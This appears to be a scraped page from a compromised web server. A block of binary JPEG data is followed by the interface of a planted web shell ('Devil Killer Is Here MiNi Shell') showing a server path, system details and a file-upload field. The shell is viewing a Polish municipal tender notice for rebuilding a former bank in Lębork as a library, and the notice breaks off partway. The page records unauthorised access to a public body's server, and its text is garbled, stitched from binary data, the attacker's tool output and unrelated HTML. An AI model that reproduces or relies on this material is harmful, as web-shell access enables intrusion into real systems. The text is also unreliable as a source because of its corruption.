JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251107/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251107/0052260801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Bank Kultury – przebudowa dawnego banku na siedzibę Miejskiej Biblioteki Publicznej w Lęborku (etap II) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bank Kultury – przebudowa dawnego banku na siedzibę Miejskiej Biblioteki Publicznej w Lęborku (etap II) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7ab7684c-3f91-4add-905f-d17a336df977</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00522608</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00045591/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Bank Kultury - przebudowa dawnego banku na siedzibę Miejskiej Biblioteki Publicznej w Lęborku (etap II)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie dofinansowane w ramach Programu Fundusze Europejskie dla Pomorza 2021 – 2027, Priorytetu 6. Fundusze europejskie dla silnego społecznie Pomorza (EFRR), Działania 6.10. Infrastruktura kultury, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umlebork.ezamawiajacy.pl/pn/UMLEBORK/demand/notice/publicpzp/during/list <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umlebork.ezamawiajacy.pl/pn/UMLEBORK/demand/notice/publicpzp/during/list</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Porozumiewanie się Zamawiającego<br/>z Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy eZamawiający Urzędu Miasta Lębork<br/>https://umlebork.ezamawiajacy.pl/servlet/HomeServlet. Istnieje możliwość kierowania zapytania za pomocą środków komunikacji<br/>elektronicznej – e-mail: inwestycje@um.lebork.pl – z zastrzeżeniem wymogów odnośnie poszczególnych oświadczeń i dokumentów<br/>określonych w niniejszej SWZ.<br/>2. Zaleca się aby Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, posiadał konto na<br/>platformie eZamawiający Urzędu Miasta Lębork.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy użyciu platformy<br/>eZamawiający opisane zostały w instrukcji dla Wykonawcy dostępnej pod adresem:<br/>https://umlebork.ezamawiajacy.pl/servlet/HomeServlet?<br/>MP_action=publicFilesList&amp;folder=002c&amp;clientName=UMLEBORK&amp;MP_module=main<br/>4. Za datę przekazania oferty, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,<br/>oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę eZamawiający.<br/>5. Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: inwestycje@um.lebork.pl.<br/>6. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem platformy eZamawiający jako załączniki. Sposób sporządzania dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 r., poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych ) (Dz. Urz. UE<br/>L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1.1. administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii Krajowej 14, 84 300 Lębork, tel. 59 8624 280;<br/>1.2. inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest pani Bożena Steciuk, e-mail: iod@um.lebork.pl,<br/>tel. 59 8637 733;<br/>1.3. dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z<br/>niniejszym postępowaniem o udzielenie zamówienia publicznego na Wykonanie dokumentacji projektowo-kosztorysowej nowego<br/>obiektu mostowego przez rz. Okalica w ciągu ul. Staszica w Lęborku, prowadzonym w trybie podstawowym bez przeprowadzenia<br/>negocjacji na podst. art. 275 pkt.1.<br/>1.4. odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych z dnia 11.09.2019 r.(tj. z 2024 r.<br/>poz. 1320 z późn. zm), dalej Ustawa Pzp;<br/>1.5. dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 5 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia;<br/>1.6. obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>1.7. w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>1.8. Wykonawca posiada:<br/>1.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2. na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy;<br/>1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie danych<br/>osobowych dotyczących Wykonawcy narusza przepisy RODO;<br/>1.9. Wykonawcy nie przysługuje:<br/>1..9.1. w związku z art. 17 ust. 3 lit. b d lub e RODO prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.36.2025.I</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja robót objętych II etapem przebudowy dawnego budynku banku przy Al. Wolności 73 na siedzibę Miejskiej Biblioteki Publicznej w Lęborku. Zakres etapu II obejmuje:<br/>1.1.	wykonanie robót budowlanych na poziomie II piętra (roboty izolacyjne, roboty posadzkowe, tynkowanie, malowanie, montaż nowej stolarki, roboty branży elektrycznej (montaż osprzętu, opraw oświetleniowych oraz instalacji oświetlenia awaryjnego i ewakuacyjnego), prace uzupełniające z branży sanitarnej (instalacja wodociągowa, kanalizacji sanitarnej, instalacja rozprowadzenia powietrza, instalacja odprowadzania skroplin, montaż urządzeń sanitarnych wodno – kanalizacyjnych, instalacja c.o.);<br/>1.2. montaż na dachu budynku instalacji fotowoltaicznej o mocy 49,98 kW wraz z magazynem energii oraz zastosowanie kontrolera prądu wstecznego uniemożliwiającego przepływ energii elektrycznej do sieci elektroenergetycznej;<br/>1.3.	wykonanie zielonego dachu na budynku Miejskiej Biblioteki Publicznej <br/>1.4.	wykonanie ogrodu deszczowego składającego się z 5 donic wraz z nasadzoną roślinnością hydrofilową<br/>2.	Powierzchnia użytkowa etapu II: 671,32 m2.<br/>3.	Numer kategorii wg Wspólnego Słownika Zamówień:<br/>45000000-7 Roboty budowlane, <br/>45450000-6 Roboty wykończeniowe w zakresie obiektów budowlanych<br/>45300000-0 Roboty instalacyjne w budynkach<br/>4.	Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową pn. „Przebudowa budynku wraz ze zmianą sposobu użytkowania na potrzeby biblioteki” składającą się z następujących elementów:<br/>- Projekt budowlany wielobranżowy stanowiący załącznik nr 10 do SWZ<br/>- Projekt wykonawczy wielobranżowy stanowiący załącznik nr 11 do SWZ<br/>- Projekt zagospodarowania wnętrz stanowiący załącznik nr 12 do SWZ<br/>- Projekt systemu sygnalizacji pożarowej stanowiący załącznik nr 13 do SWZ<br/>- Przedmiary stanowiące załącznik nr 14 do SWZ <br/>	- Decyzja Starosty Lęborskiego nr 424/18 z dnia 02.10.2018 r. o pozwoleniu na budowę stanowiąca załącznik nr 15 do SWZ<br/>- Projekt budowlany instalacji fotowoltaicznej stanowiący Załącznik nr 16 do SWZ<br/>- Remont pokrycia dachu płaskiego w budynku przy Al. Wolności 73 w Lęborku stanowiący Załącznik nr 17 do SWZ<br/>- Zagospodarowanie terenu mała architektura - ogrody deszczowe przy budynku Al. Wolności 73 w Lęborku stanowiący Załącznik nr 19 do SWZ<br/>- Raport firmy FADO badania dokumentacji budowlanej pod kontem dostępności stanowiący załącznik nr 18 do SWZ<br/>- Koncepcja oświetlenia stanowiąca załącznik nr 20 do SWZ<br/>- Opinia techniczna stanowiąca załącznik nr 21 do SWZ<br/>5.	Zakres zamówienia obejmować będzie:<br/>a)	Prace konstrukcyjne:<br/>•	uzupełnienie bruzd po prowadzeniu instalacji<br/>•	przejścia i ich obróbka na potrzeby instalacji<br/>•	naprawa spękań w ścianach powstałych po montażu konstrukcji wsporczej stalowej oraz wyburzeniu ścian<br/>•	wykonanie ścian działowych i zamurowanie otworów zgodnie z projektem<br/>b)	Prace wykończeniowe:<br/>•	izolacje cieplne, przeciwdźwiękowe, przeciwwilgociowe i przeciwwodne<br/>•	wykonanie podkładów cementowych pod posadzki<br/>•	wykonanie podkładu wyrównawczego pod posadzkę winylową<br/>•	wykonanie podłogi winylowej <br/>•	cokół z czarnego konglomeratu<br/>•	montaż drzwi wewnętrznych do toalet zgodnie z projektem<br/>•	montaż drzwi wewnętrznych zgodnie z projektem<br/>•	ułożenie płytek gresowych podłogowych - łazienka posadzka<br/>•	ułożenie płytek gresowych - łazienka ściany - zgodnie z projektem i wytycznymi<br/>•	posadzki z wykładziny w kaflach 50x50<br/>•	posadzki z płyty ceramicznej tekstylnej 120x120<br/>•	posadzki z płytek gresowych drewnopochodnych<br/>•	cokół podłogowy z listew fornirowanych, przeciwwilgociowych<br/>•	wykonanie posadzki epoksydowej<br/>•	wykonanie sufitów rastrowych z płyt MDF<br/>•	wykonanie sufitów podwieszanych z płyt g-k<br/>•	szpachlowanie i malowanie sufitów w kolorze uzgodnionym z Zamawiającym<br/>•	uzupełnienie tynku - ściany i sufity<br/>•	zmywanie i szlifowanie ścian<br/>•	szpachlowanie i malowanie ścian w kolorze zgodnie z projektem<br/>•	montaż drzwiczek rewizyjnych np. w łazienkach<br/>•	zabudowa pionów, szachtów, słupów<br/>•	wykonanie okładzin na stopniach pośrednich w obrębie 2 piętra<br/>•	wykonanie obustronnych pochwytów dla stopni pośrednich 2 piętro<br/>•	wypełnienie bruzd i przejść instalacyjnych<br/>c)	Prace instalacyjne – sanitarne:<br/><br/>	Instalacje wod. – kan<br/>•	rozprowadzenie instalacji kanalizacyjnej w obrębie 2 piętra<br/>•	rozprowadzenie instalacji wodnej zw, cwu, cyrk. w obrębie 2 piętra<br/>•	montaż przyborów sanitarnych - umywalki wg projektu<br/>•	montaż przyborów sanitarnych – natrysk<br/>•	montaż przyborów sanitarnych - miski wc<br/>•	montaż przyborów sanitarnych - pisuar wraz z zaworem<br/>•	montaż przyborów sanitarnych – zlewozmywak<br/>•	montaż przyborów sanitarnych – baterii<br/>•	montaż zaworów czerpalnych<br/>•	montaż wyposażenia pomocniczego wc dla niepełnosprawnych - pochwyty składane przy misce wc, pochwyty stałe przy umywalce<br/>•	montaż instalacji przyzywowej w toalecie dla niepełnosprawnych<br/>•	przedłużenie pionów kanalizacyjnych wraz z montażem wywiewek<br/>•	wykonanie instalacji odprowadzenia skroplin z jednostek wewnętrznych klimatyzacji<br/><br/>Instalacje CO CT<br/>•	rozprowadzenie instalacji CO wraz z armaturą w poziomie 2 pietra<br/>•	montaż grzejników zgodnie z projektem wykonawczym CO i CT<br/>•	montaż głowic termostatycznych<br/><br/>	Instalacja wentylacja i klimatyzacja<br/>•	rozprowadzenie instalacji wentylacji nawiewno wywiewnej w obrębie 2 piętra<br/>•	wykonanie instalacji wentylacji grawitacyjnej wyciągowej wraz ze wspomagającymi wentylatorami z pomieszczeń sanitarnych<br/>•	montaż elementów zakończenia instalacji wentylacji mechanicznej i grawitacyjnej<br/>•	rozprowadzenie instalacji chłodniczych freonowych do jednostek wewnętrznych klimatyzacji<br/>•	montaż klimatyzatorów wewnętrznych wraz z regulatorami<br/><br/>d)	Prace instalacyjne – elektryczne i teletechniczne:<br/><br/>Instalacje gniazdowe i oświetleniowe<br/>•	rozprowadzenie instalacji elektrycznych w obrębie 2 pietra<br/>•	montaż pozostałych rozdzielnic piętrowych elektrycznych i technicznych<br/>•	montaż opraw oświetleniowych zgodnie z projektem oraz koncepcją oświetlenia z dnia 15.02.2024 (Załącznik nr 19 do SWZ)<br/>•	montaż gniazd wtykowych zgodnie z projektem<br/>•	podłączenie urządzeń technicznych wymagających zasilania np. klimatyzatory, wentylatory wyciągowe itp.<br/>•	montaż oświetlenia awaryjnego i ewakuacyjnego zgodnie z przepisami<br/>•	wykonanie przejść pożarowych przez przegrody oddzielenie pożarowego<br/><br/>	Instalacja SSP<br/>•	demontaż i ponowny montaż po wykonaniu prac wykończeniowych elementów instalacji SSP (czujki dymu, sygnalizatory optyczno akustyczne, rop)<br/><br/>	Instalacja LAN<br/>•	wykonanie okablowania strukturalnego<br/>•	montaż gniazd i punktów dostępowych AV, rozdzielnic<br/>•	montaż gniazd LAN i doprowadzenie zasilenia do pom. 2.06 (docelowo umiejscowienie szafy RACK)<br/>•	przygotować okablowanie dla Acess Point w pom. 2.02, 2.05, pom. 2.22, przed pom. 2.11)<br/><br/>	Instalacja RTV i CCTV<br/>•	wykonanie okablowania<br/>•	montaż gniazd RTV zgodnie z dokumentacją<br/>•	montaż kamer (3szt), czujek ruchu (6szt), manipulator (1szt), sygnalizator optyczno dźwiękowy (1 szt)<br/>•	montaż rozdzielnicy piętrowej<br/><br/>	Instalacje TEL telefoniczna (1 telefon – sala konferencyjna)<br/>•	wykonanie okablowania<br/>•	montaż gniazd, urządzeń, rozdzielnic<br/><br/>	Instalacja AV audiowizualna:<br/>•	wykonanie okablowania<br/>•	montaż gniazd, urządzeń, rozdzielnic (w sali konferencyjnej pom. 2.02 przewidzieć zasilenie dla nagłośnienia)<br/>e)	Instalacje fotowoltaiczne<br/>•	montaż i konfiguracja instalacji fotowoltaicznej<br/>•	montaż magazynu energii<br/>•	zastosowanie kontrolera prądu wstecznego uniemożliwiającego przepływ energii elektrycznej do sieci elektroenergetycznej<br/>f)	Wykonanie ogrodu deszczowego w formie 5 skrzyni betonowych; woda doprowadzona za pomocą rury spustowej<br/>g)	Remont pokrycia dachu płaskiego z zastosowaniem rozwiązań materiałowych typu zielony dach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty posługiwać się będzie następującymi kryteriami:<br/>a. Kryterium „Cena oferty” (C) - waga kryterium 60%<br/>Przyjmuje się, że oferta z najniższą ceną otrzyma 60 pkt.<br/><br/> cena najniższa<br/>	C = --------------------------------- x 60 pkt<br/> cena danego Wykonawcy<br/><br/>b. Kryterium „Okres gwarancji” (G) – długość okresu gwarancji (nie mniej niż 36 miesięcy, nie więcej niż 84 miesiące) – 40%.<br/><br/>Jeżeli Wykonawca wskaże w ofercie okres gwarancji powyżej 84 miesięcy Zamawiający przyjmie do obliczeń wartość 84 miesięcy;<br/>Oferty są punktowane liniowo wedle następującej formuły arytmetycznej:<br/> (Xi – 36)<br/>G = ilość punktów = * 40 pkt<br/> (84 - 36)<br/>gdzie:<br/>Xi - ilość pełnych miesięcy okresu gwarancji ocenianej oferty (nie mniej niż obowiązkowe 36 miesięcy i nie więcej niż maksymalna ilość 84 miesiące).<br/>UWAGA: <br/>Czas trwania okresu gwarancji należy określić w pełnych miesiącach, liczony od miesiąca następnego, w którym nastąpił odbiór końcowy przedmiotu zamówienia<br/><br/>2.	Łączna punktacja oferty = suma punktów (C + G)<br/>gdzie:<br/>C – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Cena”<br/>G – liczba punktów jaką może zdobyć oferta (Wykonawca) za kryterium „Okres gwarancji”<br/>Maksymalna liczba punktów: 100<br/>3.	Oferta, która uzyska najwyższą łączną punktację, uważana jest za najwyżej ocenioną.<br/>4.	Maksymalna ilość punktów, jaką może zdobyć Wykonawca uwzględniając wszystkie kryteria oceny ofert wynosi 100 pkt. Za najwyżej ocenioną zostanie uznana oferta, która otrzyma najwyższą liczbę punktów. W przypadku równej ilości punktów za najkorzystniejszą ofertę zostanie uznana oferta, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5.	Brak wypełnienia przez Wykonawcę w formularzu oferty ceny lub innego kryterium oceny ofert lub wskaże okres gwarancji poniżej 36 miesięcy, spowoduje to odrzucenie oferty, jako niezgodnej z treścią SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> 